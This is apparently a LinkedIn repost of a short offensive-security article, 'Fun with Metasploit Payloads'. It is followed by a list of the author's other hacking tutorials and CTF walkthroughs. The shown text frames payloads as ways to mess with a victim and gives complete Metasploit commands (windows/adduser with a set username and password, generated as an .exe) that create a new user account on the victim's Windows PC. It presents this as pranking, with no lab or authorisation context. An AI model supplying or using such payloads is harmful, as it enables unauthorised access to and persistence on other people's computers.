Fun with Metasploit Payloads

Fun with Metasploit Payloads

Ordinarily small things have no use but whenever it comes up to their greater relevance then at certain point of time it has a universalized impact and can create a complex situation. And this article is about some simple payloads that can help us to muddle with our victim. Hence, leaving a mark behind.

Moreover metasploit is not about hacking but it’s also about hacking in style. There are a lot of payloads that are too good to not to use. These payloads are like small droplets in an ocean but still they matter and there are only handful of people who about these payloads. Also so far we have only learnt about hardcore metasploit but let’s see what more cools things it has to show us.

Add User

Moving forward, let us learn how to make such payloads, open metasploit and use windows/adduser payload. This payload lets you create another user in your victim’s PC. The commands are:

use windows/adduser

set user raaz

set pass Ignite@123

set wmic true

generate -t exe -f /root/Desktop/user.exe

Read the whole article here.

要查看或添加评论,请登录

Yashika Dhir的更多文章

  • Command & Control Tool: Pupy

    Command & Control Tool: Pupy

    In this article, we will learn to exploit Windows, Linux and Android with pupy command and control tool. Table of…

    1 条评论
  • Comprehensive Guide on Hydra – A Brute Forcing Tool

    Comprehensive Guide on Hydra – A Brute Forcing Tool

    Today we are going to discuss – How much impact hydra has in cracking login credential of various protocols to make…

  • Hack the Box: Bounty Walkthrough

    Hack the Box: Bounty Walkthrough

    Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box…

    1 条评论
  • Comprehensive Guide on SearchSploit

    Comprehensive Guide on SearchSploit

    Hello friends!! Several times you might have read our articles on CTF challenges and other, where we have used…

  • Collection of 190 CTF Challenges Writeups (Vulnhub+HTB)

    Collection of 190 CTF Challenges Writeups (Vulnhub+HTB)

    Hack the Box: Olympus Walkthrough Hack the Box: Sunday Walkthrough Hack the Gemini inc:2 (CTF Challenge) Hack the Box…

  • Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

    Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

    BTRSys is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for…

  • Hack the BTRSys1 VM (Boot2Root Challenge)

    Hack the BTRSys1 VM (Boot2Root Challenge)

    BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a…

  • Hack the SpyderSec VM (CTF Challenge)

    Hack the SpyderSec VM (CTF Challenge)

    You are looking for two flags. Using discovered pointers in various elements of the running web application you can…

  • Hack the VulOS 1.1 VM (CTF Challenge)

    Hack the VulOS 1.1 VM (CTF Challenge)

    “Your assignment is to pentest a company website, get root of the system and read the final flag” is the only thing we…

    1 条评论
  • Hack the SickOS 1.1 VM (CTF Challenge)

    Hack the SickOS 1.1 VM (CTF Challenge)

    This time we are going to crack SickOS 1.1 in the Boot2root challenges.

社区洞察

其他会员也浏览了